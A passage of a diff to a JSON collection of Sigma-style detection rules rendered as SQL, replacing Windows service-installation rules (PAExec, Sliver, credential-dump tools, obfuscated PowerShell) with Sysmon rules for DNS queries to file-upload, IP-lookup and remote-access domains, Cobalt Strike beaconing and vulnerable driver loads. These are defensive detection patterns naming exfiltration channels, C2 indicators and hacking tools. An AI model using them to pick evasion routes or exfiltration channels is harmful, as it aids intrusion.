Files\\\\Common Files\\\\Zoom\\\\Support\\\\CptService.exe%' ESCAPE '\\')))" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%.anonfiles.com%' ESCAPE '\\')" ], - "filename": "win_system_susp_service_installation_folder.yml" + "filename": "dns_query_win_anonymfiles_com.yml" }, { - "title": "PAExec Service Installation", - "id": "de7ce410-b3fb-4e8a-b38c-3b999e2c3420", - "status": "experimental", - "description": "Detects PAExec service installation", - "author": "Nasreddine Bencherchali (Nextron Systems)", + "title": "Suspicious DNS Query for IP Lookup Service APIs", + "id": "ec82e2a5-81ea-4211-a1f8-37a0286df2c2", + "status": "test", + "description": "Detects DNS queries for IP lookup services such as \"api.ipify.org\" originating from a non browser process.", + "author": "Brandon George (blog post), Thomas Patzke (rule)", "tags": [ - "attack.execution", - "attack.t1569.002" + "attack.reconnaissance", + "attack.t1590" ], "falsepositives": [ - "Unknown" + "Legitimate usage of IP lookup services such as ipify API" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ServiceName LIKE 'PAExec-%' ESCAPE '\\' OR ImagePath LIKE 'C:\\\\WINDOWS\\\\PAExec-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%api.2ip.ua%' ESCAPE '\\' OR QueryName LIKE '%api.ipify.org%' ESCAPE '\\' OR QueryName LIKE '%bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%canireachthe.net%' ESCAPE '\\' OR QueryName LIKE '%checkip.amazonaws.com%' ESCAPE '\\' OR QueryName LIKE '%checkip.dyndns.org%' ESCAPE '\\' OR QueryName LIKE '%curlmyip.com%' ESCAPE '\\' OR QueryName LIKE '%edns.ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%eth0.me%' ESCAPE '\\' OR QueryName LIKE '%freegeoip.app%' ESCAPE '\\' OR QueryName LIKE '%icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ident.me%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.io%' ESCAPE '\\' OR QueryName LIKE '%ifconfig.me%' ESCAPE '\\' OR QueryName LIKE '%ip-api.com%' ESCAPE '\\' OR QueryName LIKE '%ip.anysrc.net%' ESCAPE '\\' OR QueryName LIKE '%ip.tyk.nu%' ESCAPE '\\' OR QueryName LIKE '%ipaddressworld.com%' ESCAPE '\\' OR QueryName LIKE '%ipecho.net%' ESCAPE '\\' OR QueryName LIKE '%ipinfo.io%' ESCAPE '\\' OR QueryName LIKE '%ipof.in%' ESCAPE '\\' OR QueryName LIKE '%ipv4.icanhazip.com%' ESCAPE '\\' OR QueryName LIKE '%ipv4bot.whatismyipaddress.com%' ESCAPE '\\' OR QueryName LIKE '%ipwho.is%' ESCAPE '\\' OR QueryName LIKE '%l2.io%' ESCAPE '\\' OR QueryName LIKE '%myexternalip.com%' ESCAPE '\\' OR QueryName LIKE '%wgetip.com%' ESCAPE '\\' OR QueryName LIKE '%whatismyip.akamai.com%' ESCAPE '\\' OR QueryName LIKE '%wtfismyip.com%' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_service_install_paexec.yml" + "filename": "dns_query_win_susp_ipify.yml" }, { - "title": "StoneDrill Service Install", - "id": "9e987c6c-4c1e-40d8-bd85-dd26fba8fdd6", - "status": "test", - "description": "This method detects a service install of the malicious Microsoft Network Realtime Inspection Service service described in StoneDrill report by Kaspersky", - "author": "Florian Roth (Nextron Systems)", + "title": "Suspicious LDAP Domain Access", + "id": "a21bcd7e-38ec-49ad-b69a-9ea17e69509e", + "status": "experimental", + "description": "Detect suspicious LDAP request from non-Windows application", + "author": "frack113", "tags": [ - "attack.persistence", - "attack.g0064", - "attack.t1543.003" + "attack.discovery", + "attack.t1482" ], "falsepositives": [ - "Unlikely" + "Programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName = 'NtsSrv' AND ImagePath LIKE '% LocalService' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName LIKE '\\_ldap.%' ESCAPE '\\' AND NOT ((Image LIKE 'C:\\\\Windows\\\\%' ESCAPE '\\') OR ((Image LIKE 'C:\\\\ProgramData\\\\Microsoft\\\\Windows Defender\\\\Platform\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Windows Defender\\\\MsMpEng.exe%' ESCAPE '\\') AND Image LIKE '%\\\\MsMpEng.exe' ESCAPE '\\') OR (Image = '') OR (Image LIKE 'C:\\\\WindowsAzure\\\\GuestAgent%' ESCAPE '\\')))" ], - "filename": "win_system_apt_stonedrill.yml" + "filename": "dns_query_win_susp_ldap.yml" }, { - "title": "ProcessHacker Privilege Elevation", - "id": "c4ff1eac-84ad-44dd-a6fb-d56a92fc43a9", + "title": "Suspicious TeamViewer Domain Access", + "id": "778ba9a8-45e4-4b80-8e3e-34a419f0b85e", "status": "test", - "description": "Detects a ProcessHacker tool that elevated privileges to a very high level", + "description": "Detects DNS queries to a TeamViewer domain only resolved by a TeamViewer client by an image that isn't named TeamViewer (sometimes used by threat actors for obfuscation)", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Unlikely" + "Unknown binary names of TeamViewer", + "Other programs that also lookup the observed domain" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ServiceName LIKE 'ProcessHacker%' ESCAPE '\\' AND AccountName = 'LocalSystem')" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND QueryName IN ('taf.teamviewer.com', 'udp.ping.teamviewer.com') AND NOT (Image LIKE '%TeamViewer%' ESCAPE '\\'))" ], - "filename": "win_system_susp_proceshacker.yml" + "filename": "dns_query_win_susp_teamviewer.yml" }, { - "title": "Sysmon Crash", - "id": "4d7f1827-1637-4def-8d8a-fd254f9454df", + "title": "DNS Query for Ufile.io Upload Domain - Sysmon", + "id": "1cbbeaaf-3c8c-4e4c-9d72-49485b6a176b", "status": "experimental", - "description": "Detects application popup reporting a failure of the Sysmon service", - "author": "Tim Shelton", + "description": "Detects DNS queries to \"ufile.io\". Which is often abused by malware for upload and exfiltration", + "author": "yatinwad and TheDFIRReport", "tags": [ - "attack.defense_evasion", - "attack.t1562" + "attack.exfiltration", + "attack.t1567.002" ], "falsepositives": [ - "Unknown" + "Legitimate DNS queries and usage of Ufile" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Application Popup' AND EventID = '26' AND Caption = 'sysmon64.exe - Application Error')" + "SELECT * FROM logs WHERE (EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational' AND QueryName LIKE '%ufile.io%' ESCAPE '\\')" ], - "filename": "win_system_application_sysmon_crash.yml" + "filename": "dns_query_win_ufile_io.yml" }, { - "title": "Eventlog Cleared", - "id": "a62b37e0-45d3-48d9-a517-90c1a1b0186b", + "title": "DNS Query To Remote Access Software Domain", + "id": "4d07b1f4-cb00-4470-b9f8-b0191d48ff52", "status": "experimental", - "description": "One of the Windows Eventlogs has been cleared. e.g. caused by \"wevtutil cl\" command execution", - "author": "Florian Roth (Nextron Systems)", + "description": "An adversary may use legitimate desktop support and remote access software, such as Team Viewer, Go2Assist, LogMein, AmmyyAdmin, etc, to establish an interactive command and control channel to target systems within networks.\nThese services are commonly used as legitimate technical support software, and may be allowed by application control within a target environment.\nRemote access tools like VNC, Ammyy, and Teamviewer are used frequently when compared with other legitimate software commonly used by adversaries. (Citation: Symantec Living off the Land)\n", + "author": "frack113, Connor Martin", "tags": [ - "attack.defense_evasion", - "attack.t1070.001", - "car.2016-04-002" + "attack.command_and_control", + "attack.t1219" ], "falsepositives": [ - "Rollout of log collection agents (the setup routine often includes a reset of the local Eventlog)", - "System provisioning (system reset before the golden image creation)" + "Likely with other browser software" ], "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (EventID = '104' AND Provider_Name = 'Microsoft-Windows-Eventlog') AND NOT (Channel IN ('System', 'Security', 'Application')))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (QueryName LIKE '%.getgo.com' ESCAPE '\\' OR QueryName LIKE '%.logmein.com' ESCAPE '\\' OR QueryName LIKE '%.ammyy.com' ESCAPE '\\' OR QueryName LIKE '%.netsupportsoftware.com' ESCAPE '\\' OR QueryName LIKE '%remoteutilities.com' ESCAPE '\\' OR QueryName LIKE '%.net.anydesk.com' ESCAPE '\\' OR QueryName LIKE '%api.playanext.com' ESCAPE '\\' OR QueryName LIKE '%.relay.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%.api.splashtop.com' ESCAPE '\\' OR QueryName LIKE '%app.atera.com' ESCAPE '\\' OR QueryName LIKE '%.agentreporting.atera.com' ESCAPE '\\' OR QueryName LIKE '%.pubsub.atera.com' ESCAPE '\\' OR QueryName LIKE '%logmeincdn.http.internapcdn.net' ESCAPE '\\' OR QueryName LIKE '%logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%client.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%integratedchat.teamviewer.com' ESCAPE '\\' OR QueryName LIKE '%static.remotepc.com' ESCAPE '\\' OR QueryName LIKE '%.n-able.com' ESCAPE '\\' OR QueryName LIKE '%comserver.corporate.beanywhere.com' ESCAPE '\\' OR QueryName LIKE '%.swi-rc.com' ESCAPE '\\' OR QueryName LIKE '%.swi-tc.com' ESCAPE '\\' OR QueryName LIKE '%telemetry.servers.qetqo.com' ESCAPE '\\' OR QueryName LIKE '%relay.screenconnect.com' ESCAPE '\\' OR QueryName LIKE '%control.connectwise.com' ESCAPE '\\' OR QueryName LIKE '%express.gotoassist.com' ESCAPE '\\' OR QueryName LIKE '%authentication.logmeininc.com' ESCAPE '\\' OR QueryName LIKE '%.services.vnc.com' ESCAPE '\\' OR QueryName LIKE '%.tmate.io' ESCAPE '\\' OR QueryName LIKE '%api.parsec.app' ESCAPE '\\' OR QueryName LIKE '%parsecusercontent.com' ESCAPE '\\' OR QueryName LIKE '%remotedesktop-pa.googleapis.com' ESCAPE '\\' OR QueryName LIKE '%.logmein-gateway.com' ESCAPE '\\' OR QueryName LIKE '%secure.logmeinrescue.com' ESCAPE '\\' OR QueryName LIKE '%join.zoho.com' ESCAPE '\\' OR QueryName LIKE '%assist.zoho.com' ESCAPE '\\' OR QueryName LIKE '%.zohoassist.com' ESCAPE '\\' OR QueryName LIKE '%downloads.zohocdn.com' ESCAPE '\\' OR QueryName LIKE '%agent.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%kickstart.jumpcloud.com' ESCAPE '\\' OR QueryName LIKE '%cdn.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%relay.kaseya.net' ESCAPE '\\' OR QueryName LIKE '%license.bomgar.com' ESCAPE '\\' OR QueryName LIKE '%.beyondtrustcloud.com' ESCAPE '\\') AND NOT ((Image LIKE '%\\\\brave.exe' ESCAPE '\\') OR ((Image LIKE 'C:\\\\Program Files\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Google\\\\Chrome\\\\Application\\\\chrome.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files (x86)\\\\Mozilla Firefox\\\\firefox.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Internet Explorer\\\\iexplore.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\maxthon.exe' ESCAPE '\\') OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeWebView\\\\Application\\\\%' ESCAPE '\\' OR Image LIKE '%\\\\WindowsApps\\\\MicrosoftEdge.exe' ESCAPE '\\' OR (Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\Edge\\\\Application\\\\msedge.exe' ESCAPE '\\')) OR ((Image LIKE 'C:\\\\Program Files (x86)\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\' OR Image LIKE 'C:\\\\Program Files\\\\Microsoft\\\\EdgeCore\\\\%' ESCAPE '\\') AND (Image LIKE '%\\\\msedge.exe' ESCAPE '\\' OR Image LIKE '%\\\\msedgewebview2.exe' ESCAPE '\\')) OR (Image LIKE '%\\\\opera.exe' ESCAPE '\\') OR (Image LIKE '%\\\\safari.exe' ESCAPE '\\') OR (Image LIKE '%\\\\seamonkey.exe' ESCAPE '\\') OR (Image LIKE '%\\\\vivaldi.exe' ESCAPE '\\') OR (Image LIKE '%\\\\whale.exe' ESCAPE '\\')))" ], - "filename": "win_system_eventlog_cleared.yml" + "filename": "dns_query_win_remote_access_software_domains.yml" }, { - "title": "Invoke-Obfuscation Via Stdin - System", - "id": "487c7524-f892-4054-b263-8a0ace63fc25", - "status": "experimental", - "description": "Detects Obfuscated Powershell via Stdin in Scripts", - "author": "Nikita Nazarov, oscd.community", + "title": "Suspicious Cobalt Strike DNS Beaconing - Sysmon", + "id": "f356a9c4-effd-4608-bbf8-408afd5cd006", + "status": "test", + "description": "Detects a program that invoked suspicious DNS queries known from Cobalt Strike beacons", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.command_and_control", + "attack.t1071.004" ], "falsepositives": [ "Unknown" ], - "level": "high", + "level": "critical", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%set%' ESCAPE '\\' AND ImagePath LIKE '%&&%' ESCAPE '\\' AND (ImagePath LIKE '%environment%' ESCAPE '\\' OR ImagePath LIKE '%invoke%' ESCAPE '\\' OR ImagePath LIKE '%input%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '22' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((QueryName LIKE 'aaa.stage.%' ESCAPE '\\' OR QueryName LIKE 'post.1%' ESCAPE '\\') OR QueryName LIKE '%.stage.123456.%' ESCAPE '\\'))" ], - "filename": "win_system_invoke_obfuscation_via_stdin_services.yml" + "filename": "dns_query_win_mal_cobaltstrike.yml" }, { - "title": "Sliver C2 Default Service Installation", - "id": "31c51af6-e7aa-4da7-84d4-8f32cc580af2", + "title": "Vulnerable HackSys Extreme Vulnerable Driver Load", + "id": "295c9289-acee-4503-a571-8eacaef36b28", "status": "experimental", - "description": "Detects known malicious service installation that appear in cases in which a Sliver implants execute the PsExec commands", - "author": "Florian Roth (Nextron Systems), Nasreddine Bencherchali", + "description": "Detects the load of HackSys Extreme Vulnerable Driver which is an intentionally vulnerable Windows driver developed for security enthusiasts to learn and polish their exploitation skills at Kernel level and often abused by threat actors", + "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ - "attack.execution", "attack.privilege_escalation", - "attack.t1543.003", - "attack.t1569.002" + "attack.t1543.003" ], "falsepositives": [ - "Unknown" + "Unlikely" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath REGEXP '^[a-zA-Z]:\\\\windows\\\\temp\\\\[a-zA-Z0-9]{10}\\.exe' OR ServiceName IN ('Sliver', 'Sliver implant')))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (ImageLoaded LIKE '%\\\\HEVD.sys' ESCAPE '\\' OR (Hashes LIKE '%IMPHASH=f26d0b110873a1c7d8c4f08fbeab89c5%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c46ea2e651fd5f7f716c8867c6d13594%' ESCAPE '\\') OR Imphash IN ('f26d0b110873a1c7d8c4f08fbeab89c5', 'c46ea2e651fd5f7f716c8867c6d13594')))" ], - "filename": "win_system_service_install_sliver.yml" + "filename": "driver_load_win_vuln_hevd_driver.yml" }, { - "title": "Hacktool Service Registration or Execution", - "id": "d26ce60c-2151-403c-9a42-49420d87b5e4", - "status": "test", - "description": "Detects PsExec service installation and execution events (service and Sysmon)", + "title": "WinDivert Driver Load", + "id": "679085d5-f427-4484-9f58-1dc30a7c426d", + "status": "experimental", + "description": "Detects the load of the Windiver driver, a powerful user-mode capture/sniffing/modification/blocking/re-injection package for Windows", "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.execution", - "attack.t1569.002", - "attack.s0029" + "attack.collection", + "attack.defense_evasion", + "attack.t1599.001", + "attack.t1557.001" ], "falsepositives": [ - "Unknown" + "Legitimate WinDivert driver usage" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID IN ('7045', '7036')) AND ((ServiceName LIKE '%WCESERVICE%' ESCAPE '\\' OR ServiceName LIKE '%WCE SERVICE%' ESCAPE '\\' OR ServiceName LIKE '%winexesvc%' ESCAPE '\\' OR ServiceName LIKE '%DumpSvc%' ESCAPE '\\' OR ServiceName LIKE '%pwdump%' ESCAPE '\\' OR ServiceName LIKE '%gsecdump%' ESCAPE '\\' OR ServiceName LIKE '%cachedump%' ESCAPE '\\') OR ImagePath LIKE '%bypass%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\WinDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\WinDivert64.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\NordDivert.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\lingtiwfp.sys%' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\eswfp.sys%' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=0604bb7cb4bb851e2168d5c7d9399087%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2e5f0e649d97f32b03c09e4686d0574f%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=52f8aa269f69f0edad9e8fcdaedce276%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c0e5d314da39dbf65a2dbff409cc2c76%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=58623490691babe8330adc81cd04a663%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=8ee39b48656e4d6b8459d7ba7da7438b%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=45ee545ae77e8d43fc70ede9efcd4c96%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a1b2e245acd47e4a348e1a552a02859a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=2a5f85fe4609461c6339637594fa9b0a%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6b2c6f95233c2914d1d488ee27531acc%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9f2fdd3f9ab922bbb0560a7df46f4342%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=d8a719865c448b1bd2ec241e46ac1c88%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0ea54f8c9af4a2fe8367fa457f48ed38%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=9d519ae0a0864d6d6ae3f8b6c9c70af6%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a74929edfc3289895e3f2885278947ae%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=a66b476c2d06c370f0a53b5537f2f11e%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=bdcd836a46bc2415773f6b5ea77a46e4%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=c28cd6ccd83179e79dac132a553693d9%' ESCAPE '\\') OR Imphash IN ('0604bb7cb4bb851e2168d5c7d9399087', '2e5f0e649d97f32b03c09e4686d0574f', '52f8aa269f69f0edad9e8fcdaedce276', 'c0e5d314da39dbf65a2dbff409cc2c76', '58623490691babe8330adc81cd04a663', '8ee39b48656e4d6b8459d7ba7da7438b', '45ee545ae77e8d43fc70ede9efcd4c96', 'a1b2e245acd47e4a348e1a552a02859a', '2a5f85fe4609461c6339637594fa9b0a', '6b2c6f95233c2914d1d488ee27531acc', '9f2fdd3f9ab922bbb0560a7df46f4342', 'd8a719865c448b1bd2ec241e46ac1c88', '0ea54f8c9af4a2fe8367fa457f48ed38', '9d519ae0a0864d6d6ae3f8b6c9c70af6', 'a74929edfc3289895e3f2885278947ae', 'a66b476c2d06c370f0a53b5537f2f11e', 'bdcd836a46bc2415773f6b5ea77a46e4', 'c28cd6ccd83179e79dac132a553693d9')))" ], - "filename": "win_system_service_install_hacktools.yml" + "filename": "driver_load_win_windivert.yml" }, { - "title": "Invoke-Obfuscation Via Use Clip - System", - "id": "63e3365d-4824-42d8-8b82-e56810fefa0c", + "title": "Vulnerable Lenovo Driver Load", + "id": "ac683a42-877b-4ff8-91ac-69e94b0f70b4", "status": "experimental", - "description": "Detects Obfuscated Powershell via use Clip.exe in Scripts", - "author": "Nikita Nazarov, oscd.community", + "description": "Detects the load of the vulnerable Lenovo driver as reported in CVE-2022-3699 which can be used to escalate privileges", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate driver loads (old driver that didn't receive an update)" ], "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%(Clipboard|i%' ESCAPE '\\')" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((Hashes LIKE '%SHA256=F05B1EE9E2F6AB704B8919D5071BECBCE6F9D0F9D0BA32A460C41D5272134ABE%' ESCAPE '\\' OR Hashes LIKE '%SHA1=B89A8EEF5AEAE806AF5BA212A8068845CAFDAB6F%' ESCAPE '\\' OR Hashes LIKE '%MD5=B941C8364308990EE4CC6EADF7214E0F%' ESCAPE '\\') OR sha256 = 'f05b1ee9e2f6ab704b8919d5071becbce6f9d0f9d0ba32a460c41d5272134abe' OR sha1 = 'b89a8eef5aeae806af5ba212a8068845cafdab6f' OR md5 = 'b941c8364308990ee4cc6eadf7214e0f'))" ], - "filename": "win_system_invoke_obfuscation_via_use_clip_services.yml" + "filename": "driver_load_win_vuln_lenovo_driver.yml" }, { - "title": "New PDQDeploy Service - Client Side", - "id": "b98a10af-1e1e-44a7-bab2-4cc026917648", + "title": "Vulnerable AVAST Anti Rootkit Driver Load", + "id": "7c676970-af4f-43c8-80af-ec9b49952852", "status": "experimental", - "description": "Detects PDQDeploy service installation on the target system.\nWhen a package is deployed via PDQDeploy it installs a remote service on the target machine with the name \"PDQDeployRunner-X\" where \"X\" is an integer starting from 1\n", + "description": "Detects the load of a signed and vulnerable AVAST Anti Rootkit driver often used by threat actors or malware for stopping and disabling AV and EDR products", "author": "Nasreddine Bencherchali (Nextron Systems)", "tags": [ "attack.privilege_escalation", "attack.t1543.003" ], "falsepositives": [ - "Legitimate use of the tool" + "Unknown" ], - "level": "medium", + "level": "high", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND (Provider_Name = 'Service Control Manager' AND EventID = '7045') AND (ImagePath LIKE '%PDQDeployRunner-%' ESCAPE '\\' OR ServiceName LIKE 'PDQDeployRunner-%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND (((Hashes LIKE '%MD5=a179c4093d05a3e1ee73f6ff07f994aa%' ESCAPE '\\' OR Hashes LIKE '%SHA1=5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4%' ESCAPE '\\' OR Hashes LIKE '%SHA256=4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1%' ESCAPE '\\') OR md5 = 'a179c4093d05a3e1ee73f6ff07f994aa' OR sha1 = '5d6b9e80e12bfc595d4d26f6afb099b3cb471dd4' OR sha256 = '4b5229b3250c8c08b98cb710d6c056144271de099a57ae09f5d2097fc41bd4f1') OR (ImageLoaded LIKE '%\\\\aswArPot.sys' ESCAPE '\\' AND (Signed = 'false' OR SignatureStatus = 'Expired'))))" ], - "filename": "win_system_service_install_pdqdeploy_runner.yml" + "filename": "driver_load_win_vuln_avast_anti_rootkit_driver.yml" }, { - "title": "Invoke-Obfuscation VAR++ LAUNCHER OBFUSCATION - System", - "id": "14bcba49-a428-42d9-b943-e2ce0f0f7ae6", + "title": "Process Hacker and System Informer Driver Load", + "id": "67add051-9ee7-4ad3-93ba-42935615ae8d", "status": "experimental", - "description": "Detects Obfuscated Powershell via VAR++ LAUNCHER", - "author": "Timur Zinniatullin, oscd.community", + "description": "Detects the load of drivers used by Process Hacker and System Informer", + "author": "Florian Roth (Nextron Systems)", "tags": [ - "attack.defense_evasion", - "attack.t1027", - "attack.execution", - "attack.t1059.001" + "attack.privilege_escalation", + "cve.2021.21551", + "attack.t1543" ], "falsepositives": [ - "Unknown" + "Legitimate user of process hacker or system informer by low level developers or system administrators" ], - "level": "high", + "level": "medium", "rule": [ - "SELECT * FROM logs WHERE (Channel = 'System' AND Provider_Name = 'Service Control Manager' AND EventID = '7045' AND ImagePath LIKE '%&&set%' ESCAPE '\\' AND ImagePath LIKE '%cmd%' ESCAPE '\\' AND ImagePath LIKE '%/c%' ESCAPE '\\' AND ImagePath LIKE '%-f%' ESCAPE '\\' AND (ImagePath LIKE '%{0}%' ESCAPE '\\' OR ImagePath LIKE '%{1}%' ESCAPE '\\' OR ImagePath LIKE '%{2}%' ESCAPE '\\' OR ImagePath LIKE '%{3}%' ESCAPE '\\' OR ImagePath LIKE '%{4}%' ESCAPE '\\' OR ImagePath LIKE '%{5}%' ESCAPE '\\'))" + "SELECT * FROM logs WHERE ((EventID = '6' AND Channel = 'Microsoft-Windows-Sysmon/Operational') AND ((ImageLoaded LIKE '%\\\\kprocesshacker.sys' ESCAPE '\\' OR ImageLoaded LIKE '%\\\\SystemInformer.sys' ESCAPE '\\') OR (Hashes LIKE '%IMPHASH=821D74031D3F625BCBD0DF08B70F1E77%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=F86759BB4DE4320918615DC06E998A39%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=0A64EEB85419257D0CE32BD5D55C3A18%' ESCAPE '\\' OR Hashes LIKE '%IMPHASH=6E7B34DFC017700B1517B230DF6FF0D0%' ESCAPE '\\') OR Imphash IN ('821D74031D3F625BCBD0DF08B70F1E77', 'F86759BB4DE4320918615DC06E998A39', '0A64EEB85419257D0CE32BD5D55C3A18', '6E7B34DFC017700B1517B230DF6FF0D0') OR (Hashes LIKE 